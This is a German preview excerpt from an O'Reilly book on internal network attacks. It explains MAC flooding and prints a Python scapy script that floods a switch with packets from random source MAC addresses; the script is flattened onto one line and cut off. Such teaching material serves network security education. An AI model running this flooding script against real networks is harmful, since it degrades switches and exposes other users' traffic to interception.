MAC-Flooding-Praxis

So einfach wie die Theorie ist auch die praktische Umsetzung des Angriffs. Es müssen keinerlei Informationen zum Netzwerk oder vorhandenen Geräten in Erfahrung gebracht werden. Der Angreifer muss sich lediglich sicher sein, dass ein Switch zum Einsatz kommt.

Beispiel 8-1. MAC-Flooding Skript

from scapy import * from sys import argv from sys import exit # Überprüfe die Kommandozeilenparameter if len(argv) != 2: print "Usage:\n\tmac_spoofing.py [Anzahl]" exit(0) x = 0 # Betreten der Schleife while x < int(argv[1]): # Generieren des Ethernet-Bestandteils eth = Ether() eth.src = RandMAC() # Generieren des IP-Bestandteils ip = IP() # Zusammenfassung des fertigen Pakets final = eth/ip # Versenden des Pakets sendp(final, loop=0) x += ...

Get Netzwerkangriffe von innen now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.